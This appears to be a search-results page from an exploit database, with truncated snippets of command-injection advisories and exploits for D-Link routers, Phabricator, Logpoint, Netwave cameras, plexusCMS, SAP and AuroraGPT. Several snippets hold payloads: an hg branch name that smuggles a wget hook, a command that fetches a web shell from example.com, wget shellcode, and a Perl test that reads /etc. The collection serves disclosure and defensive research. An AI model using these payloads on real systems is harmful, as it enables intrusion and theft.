31 matches found
Command injection
In the /HNAP1/SetClientInfoDemo message, the AudioMute and AudioEnable parameters are vulnerable, and the vulnerabilities affect D-Link DIR-868L Rev.B 2.05B02 devices. In the SetClientInfoDemo.php source code, the AudioMute and AudioEnble parameters are saved in the ShellPath script file without...
Phabricator: Command injection on Phabricator instance with an evil hg branch name
Hi phabricator, I found an evil branch name of hg a repo can lead to arbitrary command injection on phabricator instance. Here is the reproduction steps: 1. Monitor a remote mercurial repo with phabricator; 2. Create a branch and called "--config=hooks.pre-log=wget" on the remote; 3. After...
Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution Exploit
Exploit for linux platform in category remote exploits Exploit Title: Unauthenticated remote root code execution on logpoint 5.6.4 Date: 11/06/17 Exploit Author: agix Vendor Homepage: https://www.logpoint.com Version: logpoint 5.6.4 Tested on: 5.6.2 Vendor contact 19/04 Exploit details sent to th...
Netwave IP Camera Server password disclosure Exploit
A vulnerability in netwave IP Camera server for ipcameras. It is possible to read Wifi password It is possible to dump memory which leads to password disclosure shodan and zoomeye dorks are included multiple camera manufacturers are affected by this vulnerability Usage Info ./pownetwave.py...
plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak
Exploit Title: plexusCMS 0.5 XSS Remote Shell Exploit Google Dork: allinurl: plx-storage Date: 22.02.2013 Exploit Author: neglomaniac Vendor Homepage: http://plexus-cms.org/ Version: 0.5 --- FILES backdoor.php simple commend execute backdoor commands.txt list of useful commands for owning remote...
dot_listing
This plugin searches for the .listing file in all the directories and subdirectories that are sent as input and if found it will try to discover new URLs from its content. The .listing file holds information about the list of files in the current directory. These files are created when download...
SAP Management Console OSExecute Payload Execution
This module executes an arbitrary payload through the SAP Management Console SOAP Interface. A valid username and password for the SAP Management Console must be provided. This module has been tested successfully on both Windows and Linux platforms running SAP Netweaver. In order to exploit a Lin...
Successful Shell Attack Detected - Unix Failed 'wget' Command
Binary data 6134.prm...
linux/x86 execve("/usr/bin/wget", "aaaa"); - 42 bytes
Exploit for linux/x86 platform in category shellcode ===================================================== linux/x86 execve"/usr/bin/wget", "aaaa"; - 42 bytes ===================================================== / Title: Linux x86 execve"/usr/bin/wget", "aaaa"; - 42 bytes Author: Jonathan Salwan...
AuroraGPT 4 Command Execution
Title : AuroraGPT V4 RCE Vulnerability Author: Amoo Arash Date : 2010-04-11 Version : 4 InformatioN Title : AuroraGPT V4 RCE Vulnerability Author : Amoo Arash ExploiT Vulnerable File : http://127.0.0.1/index.php?view=help&faq=1&ref&cmd=Command ExploiT : wget example.com/shell.txt -O shell.php...
MattWrighttextcounter.pl远程执行命令漏洞 Exploit
No description provided by source. Doru Petrescu ([email protected])提供了如下测试代码: -- cut here -- !/usr/bin/perl $URL='http://dtp.kappa.ro/a/test.shtml'; please DO modify this $EMAIL='[email protected],root'; please DO modify this if $ARGV0 $CMD=$ARGV0; else $CMD="ps ax;cd ..;cd ..;cd ..;cd etc;cat...